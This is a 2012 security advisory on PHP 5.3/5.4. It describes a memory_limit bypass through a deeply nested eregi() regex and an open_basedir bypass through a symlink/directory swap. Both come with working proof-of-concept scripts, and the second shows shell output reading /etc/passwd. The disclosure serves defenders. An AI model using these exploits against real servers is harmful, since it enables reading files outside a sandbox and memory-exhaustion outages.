[ PHP 5.4/5.3 memory_limit bypass ] Author: Maksymilian Arciemowicz Website: http://cxsecurity.com/ Date: 30.03.2012 Original link: http://cxsecurity.com/issue/WLB-2012030272 PoC's: memory_limit poc http://cxsecurity.com/issue/WLB-2012030271 open_basedir poc http://cxsecurity.com/issue/WLB-2012030270 --- 1. PHP memory_limit bypass --- Functions based on POSIX Regular Expression eg. eregi, are deprecated since PHP 5.3. In last version 5.4.0 we may still use these functions. It allow us to bypass memory_limit in PHP. eregi() function based on POSIX regexp, otherwise preg_match() based on PCRE. This is the main difference between these functions. POSIX Regex Functions Tutrial http://lu.php.net/manual/en/ref.regex.php PCRE Functions Tutrial http://lu.php.net/manual/en/ref.pcre.php In last year, we have published a fix for regcomp()/libc function from NetBSD source. eregi() use the same source code what in libc of netbsd. In result, we may exhaustion memory limit or stack in PHP See our security note: Multiple BSD libc/regcomp(3) Multiple Vulnerabilities http://cxsecurity.com/research/102 Script presented below, show how to use eregi() to exhaustion memory in PHP - http://cxsecurity.com/issue/WLB-2012030271 -- <? /* PHP 5.4 5.3 memory_limit bypass exploit poc by Maksymilian Arciemowicz http://cxsecurity.com/ cxib [ a.T] cxsecurity [ d0t] com To show memory_limit in PHP # php /www/memlimpoc.php 1 35000000 PHP Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 35000001 bytes) in /var/www/memlimpoc.php on line 12 Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 35000001 bytes) in /var/www/memlimpoc.php on line 12 and try this # php /www/memlimpoc.php 2 memory_limit bypassed */ ini_set("memory_limit","32M"); if($argv[1]==1) $sss=str_repeat("A",$argv[2]); elseif($argv[1]==2) eregi("(.?)(((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((.*){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}","a"); ?> - http://cxsecurity.com/issue/WLB-2012030271 -- Remember. Don't use memory_limit as a main memory limiter. --- 2. PHP open_basedir bypass --- PHP latest version, 5.4.0 brought many changes. safe_mode has been removed but open_basedir is still available for use. We don't need look for new ways to bypass open_basedir. The problem with symlinks is still available in PHP. safe_mode tutrial http://php.net/manual/en/features.safe-mode.php PoC: 127# cat sym.php <?php symlink("/etc/passwd", "./symlink"); ?> 127# php sym.php PHP Warning: symlink(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/www) in /www/test/sym.php on line 2 Warning: symlink(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/www) in /www/test/sym.php on line 2 127# open_basedir will disallow /etc/passwd. Let`s see: 127# ls -la total 8 drwxr-xr-x 2 www www 512 Oct 20 00:33 . drwxr-xr-x 13 www www 1536 Oct 20 00:26 .. -rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php -rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php 127# pwd /www/test 127# cat kakao.php <?php mkdir("abc"); chdir("abc"); mkdir("etc"); chdir("etc"); mkdir("passwd"); chdir(".."); mkdir("abc"); chdir("abc"); mkdir("abc"); chdir("abc"); mkdir("abc"); chdir("abc"); chdir(".."); chdir(".."); chdir(".."); chdir(".."); symlink("abc/abc/abc/abc","tmplink"); symlink("tmplink/../../../etc/passwd", "exploit"); unlink("tmplink"); mkdir("tmplink"); ?> 127# php kakao.php 127# ls -la total 12 drwxr-xr-x 4 www www 512 Oct 20 00:37 . drwxr-xr-x 13 www www 1536 Oct 20 00:26 .. drwxr-xr-x 4 www www 512 Oct 20 00:37 abc lrwxr-xr-x 1 www www 27 Oct 20 00:37 exploit -> tmplink/../../../etc/passwd -rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php -rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php drwxr-xr-x 2 www www 512 Oct 20 00:37 tmplink 127# cat exploit # passwd # root:*:0:0:god:/root:/bin/csh ... now "tmplink" is a directory. so link "exploit" will be "../../etc/passwd". We don't need bypass open_basedir, it is a design mistake. PHP will allow "tmplink/../../../etc/passwd" because ./tmplink/../../../etc/passwd really exists. PoC: http://cxsecurity.com/issue/WLB-2012030270 Remember. Don't use open_basedir as a main security feature. --- 3. References --- Multiple BSD libc/regcomp(3) Multiple Vulnerabilities http://cxsecurity.com/research/102 memory_limit bypass poc http://cxsecurity.com/issue/WLB-2012030271 PHP 5.2.11/5.3.0 Multiple Vulnerabilities http://cxsecurity.com/research/70 open_basedir bypass poc http://cxsecurity.com/issue/WLB-2012030270 --- 4. Contact --- Author: Maksymilian Arciemowicz Email: max {AA\TT cxsecurity |D|0|T] com http://cxsecurity.com/ http://cxsecurity.com/cvemap/